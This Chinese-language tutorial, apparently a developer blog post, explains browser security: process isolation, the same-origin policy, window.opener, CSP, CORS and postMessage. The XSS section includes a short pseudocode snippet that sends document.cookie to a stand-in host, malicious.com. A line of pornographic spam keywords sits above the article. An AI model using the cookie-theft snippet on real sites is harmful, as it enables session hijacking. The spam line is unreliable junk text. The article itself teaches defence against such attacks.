成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專欄INFORMATION COLUMN

同源策略

社區(qū)管理員 / 757人閱讀

一、瀏覽器安全

無風(fēng)險(xiǎn)的世界不存在,包括瀏覽器,我們知道Web世界是開放的,包容的。但是開放和風(fēng)險(xiǎn)是對立的。

Web 世界會(huì)是開放的,任何資源都可以接入其中,我們的網(wǎng)站可以加載并執(zhí)行別人網(wǎng)站的腳本文件、圖片、音頻 / 視頻等資源,甚至可以下載其他站點(diǎn)的可執(zhí)行文件。

比如你打開了一個(gè)銀行站點(diǎn),然后又一不小心打開了一個(gè)惡意站點(diǎn),如果沒有安全措施,惡意站點(diǎn)就可以做很多事情:

  • 修改站點(diǎn)的 DOM、CSSOM 等信息;

  • 在銀行站點(diǎn)內(nèi)部插入 JavaScript 腳本;

  • 劫持用戶登錄的用戶名和密碼;

  • 讀取銀行站點(diǎn)的 Cookie、IndexDB 等數(shù)據(jù);

  • 甚至還可以將這些信息上傳至自己的服務(wù)器,這樣就可以在你不知情的情況下偽造一些轉(zhuǎn)賬請求等信息。

在沒有安全保障的 Web 世界中,我們是沒有隱私的,因此需要安全策略來保障我們的隱私和數(shù)據(jù)的安全,這就引出了頁面中最基礎(chǔ)、最核心的安全策略,同源策略(Same-origin policy)

瀏覽器安全可以分為三大塊——Web 頁面安全、瀏覽器網(wǎng)絡(luò)安全、瀏覽器系統(tǒng)安全

image.png

二、瀏覽器是如何工作的

思考幾個(gè)問題:

  • 為什么某些頁面會(huì)崩潰?

  • 為什么頁面崩潰后重新打開就正常了?

  • 為什么單個(gè)tab頁面、插件崩潰不會(huì)影響其他Tab?

  • 為什么有時(shí)候?yàn)g覽器突然退出?

image.png

瀏覽器的單進(jìn)程架構(gòu)和多進(jìn)程架構(gòu)

image.png

單進(jìn)程架構(gòu):不穩(wěn)定,不安全,所有的處理都在一個(gè)進(jìn)程中,某個(gè)線程出現(xiàn)問題,瀏覽器就會(huì)崩潰

多進(jìn)程架構(gòu):不同功能的進(jìn)程相互分離,每個(gè)頁面都會(huì)有一個(gè)渲染進(jìn)程,做到了進(jìn)程隔離,某個(gè)進(jìn)程的奔潰不會(huì)導(dǎo)致整個(gè)瀏覽器的崩潰

三、什么同源策略?

如果兩個(gè) URL 的協(xié)議、域名端口都相同,我們就稱這兩個(gè) URL 同源

http://ux.admin.com/task http://wx.admin.com/ticket https://ux.admin.com/ticket http://csm.admin.com/dashboard https://ux.admin.com:8080/api 復(fù)制代碼

瀏覽器默認(rèn)兩個(gè)相同的源之間是可以相互訪問資源和操作 DOM 的。

1、Dom安全

通過window.open打開頁面相同域名下的頁面

操作常見的源

點(diǎn)擊window.open按鈕,打開相同域名下的頁面

點(diǎn)擊open打開

此時(shí)在子頁面中通過window.opener操作父頁面中的Dom,發(fā)現(xiàn)生效

在子頁面中操作dom

同樣的方式,window.open打開不同域名下的頁面,同樣通過window.opener操作,返現(xiàn)報(bào)跨域錯(cuò)誤

相同的方式操作不同域名下的頁面

所以為了安全起見,通過window.open打開頁面可以增加代碼,阻止子頁面操作dom

const win = window.open("http://localhost:9000/index.html") win.opener = null 復(fù)制代碼

2、數(shù)據(jù)層面。

同源策略限制了不同源的站點(diǎn)讀取當(dāng)前站點(diǎn)的 Cookie、IndexDB、LocalStorage 等數(shù)據(jù)。由于同源策略,我們依然無法通過第二個(gè)頁面的 opener 來訪問第一個(gè)頁面中的 Cookie、IndexDB 或者 LocalStorage 等內(nèi)容。

3、網(wǎng)絡(luò)層面。

同源策略限制了通過 XMLHttpRequest 等方式將站點(diǎn)的數(shù)據(jù)發(fā)送給不同源的站點(diǎn)。你還記得在

image.png image.png

以上就是同源策略,同源策略會(huì)隔離不同源的Dom、數(shù)據(jù)和網(wǎng)絡(luò)通信等。

但在實(shí)際工作中,常常需要不同域名進(jìn)行訪問,不同資源的訪問,所以為了發(fā)展,就需要出讓一些安全策略,滿足發(fā)展的需要。

四、同源策略帶來的一些問題

1、頁面中可以嵌入第三方資源

Web 世界是開放的,可以接入任何資源,而同源策略要讓一個(gè)頁面的所有資源都來自于同一個(gè)源,也就是要將該頁面的所有 HTML 文件、JavaScript 文件、CSS 文件、圖片等資源都部署在同一臺服務(wù)器上,這無疑違背了 Web 的初衷,也帶來了諸多限制。

比如將不同的資源部署到不同的 CDN 上時(shí),CDN 上的資源就部署在另外一個(gè)域名上,因此我們就需要同源策略對頁面的引用資源開一個(gè)“口子”,讓其任意引用外部文件。

比如,惡意程序在 HTML 文件內(nèi)容中插入如下一段 JavaScript 代碼:

當(dāng)這段 HTML 文件的數(shù)據(jù)被送達(dá)瀏覽器時(shí),瀏覽器是無法區(qū)分被插入的文件是惡意的還是正常的,這樣惡意腳本就寄生在頁面之中,當(dāng)頁面啟動(dòng)時(shí),它可以修改用戶的搜索結(jié)果、改變一些內(nèi)容的連接指向,等等。

除此之外,它還能將頁面的的敏感數(shù)據(jù),如 Cookie、IndexDB、LoacalStorage 等數(shù)據(jù)通過 XSS 的手段發(fā)送給服務(wù)器。具體來講就是,當(dāng)你不小心點(diǎn)擊了頁面中的一個(gè)惡意鏈接時(shí),惡意 JavaScript 代碼可以讀取頁面數(shù)據(jù)并將其發(fā)送給服務(wù)器,如下面這段偽代碼:

function onClick(){      let url = `http://malicious.com?cookie = ${document.cookie}`      open(url) } onClick() 復(fù)制代碼

在這段代碼中,惡意腳本讀取 Cookie 數(shù)據(jù),并將其作為參數(shù)添加至惡意站點(diǎn)尾部,當(dāng)打開該惡意頁面時(shí),惡意服務(wù)器就能接收到當(dāng)前用戶的 Cookie 信息。

以上就是一個(gè)非常典型的 XSS 攻擊。為了解決 XSS 攻擊,瀏覽器中引入了內(nèi)容安全策略,稱為 CSP。

CSP 的核心思想是讓服務(wù)器決定瀏覽器能夠加載哪些資源,讓服務(wù)器決定瀏覽器是否能夠執(zhí)行內(nèi)聯(lián) JavaScript 代碼

通過這些手段就可以大大減少 XSS 攻擊。

2、跨域資源共享

為了解決這個(gè)問題,我們引入了跨域資源共享(CORS)

使用該機(jī)制可以進(jìn)行跨域訪問控制,從而使跨域數(shù)據(jù)傳輸?shù)靡园踩M(jìn)行。

正常情況下發(fā)送跨域請求,瀏覽器自動(dòng)添加Origin字段,告訴服務(wù)器本次請求的協(xié)議、域名和端口號

GET /cors HTTP/1.1 Origin: http://api.bob.com Host: api.alice.com Accept-Language: en-US Connection: keep-alive User-Agent: Mozilla/5.0... 復(fù)制代碼

返回相應(yīng)頭中包含了可以允許跨域的信息,如果響應(yīng)頭中沒有包含Access-Control-Allow-Origin,就可能出現(xiàn)錯(cuò)誤

Access-Control-Allow-Origin: http://api.bob.com Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: FooBar Content-Type: text/html; charset=utf-8 復(fù)制代碼

withCredentials

CORS請求默認(rèn)不發(fā)送Cookie和HTTP認(rèn)證信息

如果要發(fā)送服務(wù)器,服務(wù)器和客戶端都要增加參數(shù)

Access-Control-Allow-Credentials: true 復(fù)制代碼

var xhr = new XMLHttpRequest(); xhr.withCredentials = true; 復(fù)制代碼

3、跨文檔消息機(jī)制

可以通過 window.postMessage 的 JavaScript 接口來和不同源的 DOM 進(jìn)行通信。

/*  * A窗口的域名是<http://example.com:8080>,以下是A窗口的script標(biāo)簽下的代碼:  */ var popup = window.open(...popup details...); // 如果彈出框沒有被阻止且加載完成 // 這行語句沒有發(fā)送信息出去,即使假設(shè)當(dāng)前頁面沒有改變location(因?yàn)閠argetOrigin設(shè)置不對) popup.postMessage("The user is 'bob' and the password is 'secret'",                   "https://secure.example.net"); // 假設(shè)當(dāng)前頁面沒有改變location,這條語句會(huì)成功添加message到發(fā)送隊(duì)列中去(targetOrigin設(shè)置對了) popup.postMessage("hello there!", "http://example.org"); function receiveMessage(event) {   // 我們能相信信息的發(fā)送者嗎?  (也許這個(gè)發(fā)送者和我們最初打開的不是同一個(gè)頁面).   if (event.origin !== "http://example.org")     return;   // event.source 是我們通過window.open打開的彈出頁面 popup   // event.data 是 popup發(fā)送給當(dāng)前頁面的消息 "hi there yourself!  the secret response is: rheeeeet!" } window.addEventListener("message", receiveMessage, false); 復(fù)制代碼

五、小結(jié)

image.png

文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/127963.html

相關(guān)文章

  • 瀏覽器安全之同源策略

    摘要:同源策略同源策略是一種約定它是瀏覽器最核心也是最基本的安全功能如果缺少了同源策略則瀏覽器的正常功能可能會(huì)受到影響可以說是構(gòu)建在同源策略的基礎(chǔ)之上的瀏覽器只是針對同源策略的一種實(shí)現(xiàn)瀏覽器的同源策略限制了來自不同源的或腳本對當(dāng)前讀取或設(shè)置某些屬 同源策略 同源策略是一種約定,它是瀏覽器最核心也是最基本的安全功能,如果缺少了同源策略,則瀏覽器的正常功能可能會(huì)受到影響.可以說Web是構(gòu)建在同源...

    Barrior 評論0 收藏0
  • 再也不學(xué)AJAX了?。ㄈ┛缬颢@取資源 ① - 同源策略

    摘要:瀏覽器的同源策略瀏覽器所遵守的同源策略是指限制不同源之間執(zhí)行特定操作。這正是同源策略想要規(guī)避的安全隱患。目前為止,你已經(jīng)充分了解同源策略這個(gè)主題。 我們之前提到過,AJAX技術(shù)使開發(fā)者能夠?qū)W⒂诨ヂ?lián)網(wǎng)中數(shù)據(jù)的傳輸,而不再拘泥于數(shù)據(jù)傳輸?shù)妮d體。通過AJAX技術(shù),我們獲取數(shù)據(jù)的方式變得更加靈活,可控和優(yōu)雅。 但是AJAX技術(shù)并不是一把萬能鑰匙,互聯(lián)網(wǎng)中的數(shù)據(jù)隱私和數(shù)據(jù)安全(例如你的銀行賬號...

    godlong_X 評論0 收藏0
  • 同源策略》的簡單介紹

    摘要:概述同源策略是對代碼能夠操作哪些內(nèi)容的一條完整的安全限制,也是由提出的一個(gè)著名的安全策略。同源策略的目的同源政策的目的,是為了保證用戶信息的安全,防止惡意的網(wǎng)站竊取數(shù)據(jù)。 [TOC] 1、概述 同源策略是對JavaScript代碼能夠操作哪些WEB內(nèi)容的一條完整的安全限制,也是由Netscape提出的一個(gè)著名的安全策略。所謂同源簡單來說就是三個(gè)相同,**1、域名相同2、協(xié)議相同3、端口...

    gggggggbong 評論0 收藏0
  • 同源策略》的簡單介紹

    摘要:概述同源策略是對代碼能夠操作哪些內(nèi)容的一條完整的安全限制,也是由提出的一個(gè)著名的安全策略。同源策略的目的同源政策的目的,是為了保證用戶信息的安全,防止惡意的網(wǎng)站竊取數(shù)據(jù)。 [TOC] 1、概述 同源策略是對JavaScript代碼能夠操作哪些WEB內(nèi)容的一條完整的安全限制,也是由Netscape提出的一個(gè)著名的安全策略。所謂同源簡單來說就是三個(gè)相同,**1、域名相同2、協(xié)議相同3、端口...

    vpants 評論0 收藏0

發(fā)表評論

0條評論

最新活動(dòng)
閱讀需要支付1元查看
<